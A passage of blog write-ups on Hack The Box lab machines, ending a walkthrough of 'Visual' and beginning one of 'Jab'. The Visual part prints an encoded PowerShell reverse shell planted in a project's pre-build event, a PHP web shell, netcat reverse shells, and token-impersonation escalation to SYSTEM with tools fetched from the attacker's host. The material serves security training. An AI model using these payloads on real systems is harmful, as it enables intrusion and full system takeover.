JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANQA0ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA<span class="token operator">+</span>ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA<span class="token operator">+</span>ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA<span class="token operator">=</span><span class="token operator">&lt;</span><span class="token operator">/</span>PreBuildEvent<span class="token operator">></span> <span class="token operator">&lt;</span><span class="token operator">/</span>PropertyGroup<span class="token operator">></span> <span class="token operator">&lt;</span><span class="token operator">/</span>Project<span class="token operator">></span></code></pre></div> <p>I added and committed the changes, then pushed the updated code to Gitea:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Visual/TestProject] └─$ git add . ┌──(kali㉿kali)-[~/Desktop/HTB/Visual/TestProject] └─$ git commit -m "adding pre-build event to csproj" [main 185e8b2] adding pre-build event to csproj 1 file changed, 1 insertion(+) ┌──(kali㉿kali)-[~/Desktop/HTB/Visual/TestProject] └─$ git push -u origin main Username for 'http://127.0.0.1:3000': test Password for 'http://test@127.0.0.1:3000': Enumerating objects: 5, done. Counting objects: 100% (5/5), done. Delta compression using up to 4 threads Compressing objects: 100% (3/3), done. Writing objects: 100% (3/3), 1018 bytes | 1018.00 KiB/s, done. Total 3 (delta 1), reused 0 (delta 0), pack-reused 0 remote: . Processing 1 references remote: Processed 1 references in total To http://127.0.0.1:3000/test/TestProject.git e80ab55..185e8b2 main -> main branch 'main' set up to track 'origin/main'.</code></pre></div> <p>I started a listener with <code class="language-text">nc</code> and submitted the repo again to Visual. Soon after that, <code class="language-text">nc</code> caught a shell as <code class="language-text">enox</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Visual] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.54] from (UNKNOWN) [10.10.11.234] 49675 PS C:\xampp\htdocs\uploads\2cc55e6d3f5ffc99c6df152cbb9d4f> whoami visual\enox PS C:\xampp\htdocs\uploads\2cc55e6d3f5ffc99c6df152cbb9d4f> cd /users/enox/desktop PS C:\users\enox\desktop> ls Directory: C:\users\enox\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/31/2024 4:14 AM 34 user.txt</code></pre></div> <p>While enumerating the machine, I found that <code class="language-text">enox</code> had write permission in the web root:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\xampp\htdocs> icacls c:\xampp\htdocs c:\xampp\htdocs Everyone:(OI)(CI)(F) Everyone:(I)(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) BUILTIN\Users:(I)(OI)(CI)(RX) BUILTIN\Users:(I)(CI)(AD) BUILTIN\Users:(I)(CI)(WD) CREATOR OWNER:(I)(OI)(CI)(IO)(F) Successfully processed 1 files; Failed processing 0 files</code></pre></div> <p>So I downloaded the following PHP web shell to see if the web server was running as another user:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">&lt;?php system($_REQUEST[0]); ?></code></pre></div> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\xampp\htdocs> wget 10.10.14.54:8000/shell.php -o shell.php PS C:\xampp\htdocs> ls Directory: C:\xampp\htdocs Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 6/10/2023 10:32 AM assets d----- 6/10/2023 10:32 AM css d----- 6/10/2023 10:32 AM js d----- 7/31/2024 5:21 AM uploads -a---- 6/10/2023 6:20 PM 7534 index.php -a---- 7/31/2024 5:25 AM 31 shell.php -a---- 6/10/2023 4:17 PM 1554 submit.php -a---- 6/10/2023 4:11 PM 4970 vs_status.php</code></pre></div> <p>The web server was running as <code class="language-text">nt authority\local service</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Visual] └─$ curl http://10.10.11.234/shell.php?0=whoami nt authority\local service</code></pre></div> <p>To get a reverse shell as <code class="language-text">nt authority\local service</code>, I downloaded <code class="language-text">nc.exe</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\xampp\htdocs> wget 10.10.14.54:8000/nc.exe -o nc.exe PS C:\xampp\htdocs> ls Directory: C:\xampp\htdocs Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 6/10/2023 10:32 AM assets d----- 6/10/2023 10:32 AM css d----- 6/10/2023 10:32 AM js d----- 7/31/2024 5:21 AM uploads -a---- 6/10/2023 6:20 PM 7534 index.php -a---- 7/31/2024 5:29 AM 59392 nc.exe -a---- 7/31/2024 5:25 AM 31 shell.php -a---- 6/10/2023 4:17 PM 1554 submit.php -a---- 6/10/2023 4:11 PM 4970 vs_status.php</code></pre></div> <p>I started a listener and sent the shell:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Visual] └─$ curl http://10.10.11.234/shell.php?0=nc.exe%2010.10.14.54%20443%20-e%20cmd</code></pre></div> <p><code class="language-text">nc</code> caught a shell as <code class="language-text">local service</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Visual] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.54] from (UNKNOWN) [10.10.11.234] 49678 Microsoft Windows [Version 10.0.17763.4840] (c) 2018 Microsoft Corporation. All rights reserved. C:\xampp\htdocs>whoami whoami nt authority\local service</code></pre></div> <p>The <a href="https://learn.microsoft.com/en-us/windows/win32/services/localservice-account" target="_blank">local service</a> account typically has a default set of privileges, such as <code class="language-text">SeChangeNotify</code>, <code class="language-text">SeImpersonate</code>, <code class="language-text">SeCreateGlobal</code>, and others. In this instance, the account was configured to run with a restricted set of privileges:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">C:\xampp\htdocs>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled</code></pre></div> <p>The <a href="https://github.com/itm4n/FullPowers" target="_blank">FullPowers</a> tool can be used to restore default privileges for a service account, such as <code class="language-text">SeImpersonate</code>.</p> <p>In <code class="language-text">C:\programdata</code>, I downloaded <code class="language-text">FullPowers.exe</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\programdata> wget 10.10.14.54:8000/FullPowers.exe -o FullPowers.exe wget 10.10.14.54:8000/FullPowers.exe -o FullPowers.exe PS C:\programdata> ls ls Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 6/10/2023 10:56 AM chocolatey d----- 6/10/2023 10:56 AM ChocolateyHttpCache d---s- 6/10/2023 10:40 AM Microsoft d----- 6/10/2023 10:35 AM Microsoft Visual Studio d----- 7/31/2024 4:13 AM Package Cache d----- 9/19/2023 4:12 AM regid.1991-06.com.microsoft d----- 9/15/2018 12:19 AM SoftwareDistribution d----- 11/5/2022 12:03 PM ssh d----- 9/15/2018 12:19 AM USOPrivate d----- 11/5/2022 12:03 PM USOShared d----- 6/10/2023 10:09 AM VMware -a---- 7/31/2024 5:35 AM 36864 FullPowers.exe</code></pre></div> <p>After running <code class="language-text">.\FullPowers.exe</code>, I had several more privileges, including <code class="language-text">SeImpersonate</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\programdata> .\FullPowers.exe .\FullPowers.exe [+] Started dummy thread with id 3948 [+] Successfully created scheduled task. [+] Got new token! Privilege count: 7 [+] CreateProcessAsUser() OK Microsoft Windows [Version 10.0.17763.4851] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======= SeAssignPrimaryTokenPrivilege Replace a process level token Enabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeAuditPrivilege Generate security audits Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled</code></pre></div> <p><code class="language-text">SeImpersonate</code> can be leveraged to get a system shell with <a href="https://github.com/BeichenDream/GodPotato" target="_blank">GodPotato</a>. I used <code class="language-text">certutil</code> to download <code class="language-text">GodPotato-NET4.exe</code> in <code class="language-text">C:\programdata</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\programdata> certutil -urlcache -split -f "http://10.10.14.54:8000/GodPotato-NET4.exe" GodPotato-NET4.exe certutil -urlcache -split -f "http://10.10.14.54:8000/GodPotato-NET4.exe" GodPotato-NET4.exe **** Online **** 0000 ... e000 CertUtil: -URLCache command completed successfully. PS C:\programdata> ls ls Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 6/10/2023 10:56 AM chocolatey d----- 6/10/2023 10:56 AM ChocolateyHttpCache d---s- 6/10/2023 10:40 AM Microsoft d----- 6/10/2023 10:35 AM Microsoft Visual Studio d----- 7/31/2024 4:13 AM Package Cache d----- 9/19/2023 4:12 AM regid.1991-06.com.microsoft d----- 9/15/2018 12:19 AM SoftwareDistribution d----- 11/5/2022 12:03 PM ssh d----- 9/15/2018 12:19 AM USOPrivate d----- 11/5/2022 12:03 PM USOShared d----- 6/10/2023 10:09 AM VMware -a---- 7/31/2024 5:35 AM 36864 FullPowers.exe -a---- 7/31/2024 5:40 AM 57344 GodPotato-NET4.exe</code></pre></div> <p>Then, I started a listener and used <code class="language-text">GodPotato-NET4.exe</code> to send a shell with <code class="language-text">nc.exe</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\programdata> .\GodPotato-NET4.exe -cmd "C:\xampp\htdocs\nc.exe 10.10.14.54 443 -e cmd" .\GodPotato-NET4.exe -cmd "C:\xampp\htdocs\nc.exe 10.10.14.54 443 -e cmd" [*] CombaseModule: 0x140703164530688 [*] DispatchTable: 0x140703166836848 [*] UseProtseqFunction: 0x140703166213024 [*] UseProtseqFunctionParamCount: 6 [*] HookRPC [*] Start PipeServer [*] CreateNamedPipe \\.\pipe\e19ea1e7-42ef-4b71-853d-7a4d7cf79df4\pipe\epmapper [*] Trigger RPCSS [*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 [*] DCOM obj IPID: 00000802-1394-ffff-bce2-99ce67792573 [*] DCOM obj OXID: 0x7bd8eac39a8987b8 [*] DCOM obj OID: 0xc18bfa90e57fc150 [*] DCOM obj Flags: 0x281 [*] DCOM obj PublicRefs: 0x0 [*] Marshal Object bytes len: 100 [*] UnMarshal Object [*] Pipe Connected! [*] CurrentUser: NT AUTHORITY\NETWORK SERVICE [*] CurrentsImpersonationLevel: Impersonation [*] Start Search System Token [*] PID : 872 Token:0x812 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation [*] Find System Token : True [*] UnmarshalObject: 0x80070776 [*] CurrentUser: NT AUTHORITY\SYSTEM [*] process start with pid 2356</code></pre></div> <p><code class="language-text">nc</code> caught a shell as <code class="language-text">nt authority\system</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Visual] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.54] from (UNKNOWN) [10.10.11.234] 49686 Microsoft Windows [Version 10.0.17763.4840] (c) 2018 Microsoft Corporation. All rights reserved. C:\programdata>whoami whoami nt authority\system C:\programdata>cd /users/administrator/desktop cd /users/administrator/desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 82EF-5600 Directory of C:\Users\Administrator\Desktop 09/19/2023 08:20 AM &lt;DIR> . 09/19/2023 08:20 AM &lt;DIR> .. 07/31/2024 04:14 AM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 9,662,550,016 bytes free</code></pre></div>https://mgarrity.com/hack-the-box-jab/https://mgarrity.com/hack-the-box-jab/Sat, 27 Jul 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c8372dc1211a5a648bb7c14a8422674b/3b67f/jab.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABCklEQVR42mMQkdX+jwuLymn/F5LR/s8jrvVfSBrCx6cehBnwGcYrofVfSlH7v56R7n9xRa3/fJKEDWXAZRhIs4Wp3v+uONP/2+IM/k9NsvhvZKwLFNfCayhWA4WB3pNQ0/s/w13x/+Egl/9XHO3//09M+L82z+W/kJwGaS4E2c4vof1fw0D7/8ls2/+ve1r+3w+2/n+bT+D/oRDt/5rGekB53K7E7kJZnf9i8pr/5+c7/f+6cdL/L5MT/19y0fvfH6T1X0xJ57+IDIleFgOFoZTOf31Nlf+z8xz/H2kJ/N/pr/7fyEiXYMTgjWWQoaJymv+1dIF8RV3yYxnZpaJyOv8FpYEGQ/mE0iEAvVgK07frTWYAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Jab" title="" src="/static/c8372dc1211a5a648bb7c14a8422674b/50637/jab.png" srcset="/static/c8372dc1211a5a648bb7c14a8422674b/dda05/jab.png 158w, /static/c8372dc1211a5a648bb7c14a8422674b/679a3/jab.png 315w, /static/c8372dc1211a5a648bb7c14a8422674b/50637/jab.png 630w, /static/c8372dc1211a5a648bb7c14a8422674b/fddb0/jab.png 945w, /static/c8372dc1211a5a648bb7c14a8422674b/3b67f/jab.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Jab is a Windows machine running Active Directory with an XMPP server that allows open registration. Once an account has been created, a list of domain users can be retrieved and then used to run an AS-REP roast attack which results in obtaining hashes for three users. One of the hashes (<code class="language-text">jmontgomery</code>) can be cracked, providing access to another chat room on the XMPP server that contains the credentials for the <code class="language-text">svc_openfire</code> user. Enumeration with BloodHound reveals that <code class="language-text">svc_openfire</code> has DCOM privileges on the DC, this can be leveraged to obtain a shell. Further enumeration of the machine can lead to the discovery of an Openfire configuration file used for local admin console access. After setting up a tunnel, the admin console can be accessed and used to upload a malicious plugin that enables command execution as <code class="language-text">nt authority\system</code>.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ nmap -p- -sC -sV -oA nmap/output 10.10.11.4 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-19 14:59 EDT Nmap scan report for 10.10.11.4 Host is up (0.049s latency). Not shown: 65503 closed tcp ports (conn-refused) &lt;...snip...> ┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ awk '/^PORT|[0-9]+\/tcp/ {print $0}' nmap/output.nmap PORT STATE SERVICE VERSION 53/tcp open domain? 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-19 19:00:29Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name) 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name) 5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later 5223/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later 5262/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later 5263/tcp open ssl/jabber 5269/tcp open xmpp Wildfire XMPP Client 5270/tcp open ssl/xmpp Wildfire XMPP Client 5275/tcp open jabber 5276/tcp open ssl/jabber 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 7070/tcp open realserver? 7443/tcp open ssl/oracleas-https? 7777/tcp open socks5 (No authentication; connection not allowed by ruleset) 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open msrpc Microsoft Windows RPC 49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49691/tcp open msrpc Microsoft Windows RPC 49692/tcp open msrpc Microsoft Windows RPC 49697/tcp open msrpc Microsoft Windows RPC</code></pre></div> <p>Notable open ports:</p> <ul> <li>53 (DNS)</li> <li>88 (Kerberos)</li> <li>135, 445 (SMB)</li> <li>135, 593 (MSRPC)</li> <li>3268 (LDAP)</li> <li>3269 (LDAPS)</li> <li>5222, 5262, 5275 (Jabber)</li> <li>5223, 5263, 5276 (SSL/Jabber)</li> <li>5269 (XMPP)</li> <li>5270 (SSL/XMPP)</li> <li>5985 (WinRM)</li> <li>7070, 7443 (Openfire)</li> <li>7777 (socks5)</li> </ul> <p>Active Directory:</p> <ul> <li>domain: jab.htb</li> <li>hostname: DC01</li> </ul> <p>Attempting to list shares with anonymous logon resulted in an access denied error:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ netexec smb 10.10.11.4 -u '' -p '' --shares SMB 10.10.11.4 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) SMB 10.10.11.4 445 DC01 [+] jab.htb\: SMB 10.10.11.4 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED</code></pre></div> <p>So next, I looked at the XMPP (Extensible Messaging and Presence Protocol) server. An overview of XMPP as stated on the <a href="https://xmpp.org/about/technology-overview/" target="_blank">XMPP site</a>:</p> <blockquote> <p>XMPP is the Extensible Messaging and Presence Protocol, a set of open technologies for instant messaging, presence, multi-party chat, voice and video calls, collaboration, lightweight middleware, content syndication, and generalized routing of XML data.</p> </blockquote> <p>To connect to the server, I used <a href="https://www.pidgin.im/" target="_blank">Pidgin</a>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 523px; " > <a class="gatsby-resp-image-link" href="/static/a602837831c993eca7156236c2eab3bb/7cd60/pidgin-welcome.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 66.45569620253164%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAA7DAAAOwwHHb6hkAAACDUlEQVR42m1T6XraQAzMkzRgwBe+bYwvbGwOY+60+do/ff/XmEoKpiHkx3yW1lrtjHb2JY8aqJqH0cTFWH3ERPcQxSXSbAXNCKCMbapznjCh/aoZQ4n/4oWLGANlitehSZje4x8D496krxt98+1jhjQcjmyUVYt6dUBRbpEv1hJvtieYViQHKJ82fYf+0BtDB46biDw/LBBEBX1zxOlSGupmCJ0ka4Yv0lXdlzVND2BMQ8kfGDJm8wqLaos4WSLNV6iWLTHdICs+2C6IeZI1pGBDaFGQClZT1TtYTkwqLWF5b8hN2t0F680Ry7pDd/iFbn9F212xbPbY7s5oVnusaQzd4Q2r9RENoaY1L8geG3LAUrlpQSxDkj6blwijhTBk9jwOhko3P7rt4SbshifJ/HNqx7CdORwvkfl5BMdL4fip5Dxjj2JmY7tzqeVYo2Y9u4cZiuTuQjIOJLHD4fSO3f5N5F2uf3A6v1P8E6fLb9RSs8O2vUgtk3i6FC/IycCN3BrnX03Osv6b3xH0pp7Iw/jCUCHarzdDDxQTw7F1M7ghBmdZnHPMa+JN8u9AHoN59+pL/3zGdIo/q1HWR+Tlnp5SBNvPkeRkHbIPszOsGSq68ThtyJ8z6FaMtGhp7UwX2RBr71NDlTfEcIMCLjXiAzQjpPlk8Mno8rY1X9zA42Gjjym33AxBWGLqJHLoPzJxl7AAMKqiAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin" title="" src="/static/a602837831c993eca7156236c2eab3bb/7cd60/pidgin-welcome.png" srcset="/static/a602837831c993eca7156236c2eab3bb/dda05/pidgin-welcome.png 158w, /static/a602837831c993eca7156236c2eab3bb/679a3/pidgin-welcome.png 315w, /static/a602837831c993eca7156236c2eab3bb/7cd60/pidgin-welcome.png 523w" sizes="(max-width: 523px) 100vw, 523px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I clicked <code class="language-text">Add...</code> and specified the following options:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 413px; " > <a class="gatsby-resp-image-link" href="/static/04d76b71fb887ef778a142c6713adc0d/e1a93/pidgin-add-account.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 154.43037974683543%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAfCAYAAADnTu3OAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAElklEQVR42oVW227bVhDUV6RJFNuSKJK6ixTvIimJusuO7aRJWhQoUCBAH/rUvvShQIt+Tx/aX5zOLk1FcmLkYaxj8nDOntnZPad2mN1hOIjQNAYwzBHa1ljRNIboD0NsdveYF3ssltcYjkK02sPjHJmv35hDWKM5msUfqA36AezuBAYnyOQGiRut/pG80/PQG/jo9n0YfN8kWg+oCHWu7cLo5ajZPR/7m/dw/RzhdIlZcUA638GdpIjTFcJkiZGTIOOzOF3r72J1A9fLj7tSyAJGHzWr45FsDsefYRLMEcSF/nYHIXrDGIPxlOMIQ2eKgWAkzxK+i2AxegmoRMAoHdTMzoQr3uHm7jts92/x+s0P1O2NftTph0rW4WSz4xOePqug7x5+e8MEpj1BTfbeHyWI0g2SbIsoWaHL1WWSwOYH02KL9fYem8N7yrLB2JMdLeAGBYJkozuRuSa5asIqDxxvxslr+OHiuGoZQQQnKN+ls4POGzqZYuTmlGhVziXHGWEQLxFES0a4puAzJZXnoo/ZcaiXg2cvG3hx0cbLy094/qqlGS637JYadgcx/KhQMtn2hEmqCC0RvO/yf5cfG7ho2njVsE5gcsFTwocIvUj0WHFLuWbsqCHHLXuE3sin0T3Ur9pfI3SVMCRZkm7hnWooEXZ9kgWYhBkzH6DOLb+6sk7wBKFP/bxwTg8uMKT3Tm1R54ei1UuSXTTsI54gLLcc0zZpvkNEW5wTBir+s3oDz+tNTYzgG47rJBMJzpPyEKFWC/XzwoJ2yB7MyiyTsDPwuAN5lylkPJ7EjNJSUknsGWGf5RTHM0yzDWt1z9qdctUJ9WNCTAftroM4W9D8c4WMvTBB/dLAC7WNc24bm+b1rn9HunyHKRtCNr9WYpEgmx8wzbfqR8NydSHBaRlWdX8klNJzio+I8teIpyvNuBqdEH/Kb9Uk5MMKlbWq50fC9e4tNptr3N5/j/31O9pno81APFh1EinBU4LH+ETIP7K6GDtivYoXy/ZVdpAut3TZ6pzZ5TEeJaW0TZLtNLKEuk3YG0UjS3vchHZp0YdN2sf4DC8uv5AUieaq2dPmKn6UFjVlTecLdu/ZXhMjHVqqRpJQShA+raGUmJwVkoz58oZZ3Skykk0fMh3GZZ2LR11tYdMz0nNCOfV4LrjcqugoRLPiBsXqViNNc1qIpPOCdprtUKxv2eqKsyZyRlj2vUAJ43SpIpu2p/q16D3xn931j1u1vrZlyfJFY4A///ob//73D8yupxNWmzvsrr9lVNuy6zzy3pO2kQzJBzmrY3/zQcenwmtFnJhaGvJjnBxSEyWwGOlVa8h21NOxRC5dRCBjOW4Faqful9G2eIyONr8iOfyCJM4o+kEPcqnnhId+Qj1zbld+s3zDI2KBNFvzbA71kG+d3CKqm0St1YlgdCi0PVYNTJq0gsXGKaiuJNKVumxngvL9hM997Zm2RjhGzWjLdYLs7dHZXUVQrSp3HZ8N4uPPv/Fs/oDbNz/SjylLdInl9lvcv/uJNrstk2KY48+IvgTRR6K0RU9ersobmKMkqrlclswR/gcv7MiyzCQn7QAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin add account" title="" src="/static/04d76b71fb887ef778a142c6713adc0d/e1a93/pidgin-add-account.png" srcset="/static/04d76b71fb887ef778a142c6713adc0d/dda05/pidgin-add-account.png 158w, /static/04d76b71fb887ef778a142c6713adc0d/679a3/pidgin-add-account.png 315w, /static/04d76b71fb887ef778a142c6713adc0d/e1a93/pidgin-add-account.png 413w" sizes="(max-width: 413px) 100vw, 413px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After adding the user, I was asked to accept a TLS certificate:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 468px; " > <a class="gatsby-resp-image-link" href="/static/7142703755a4e089f2dc964a95d6b317/cd23f/pidgin-accept-certificate.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.06329113924051%; position: relative; bottom: 0; left: 0; background-image: 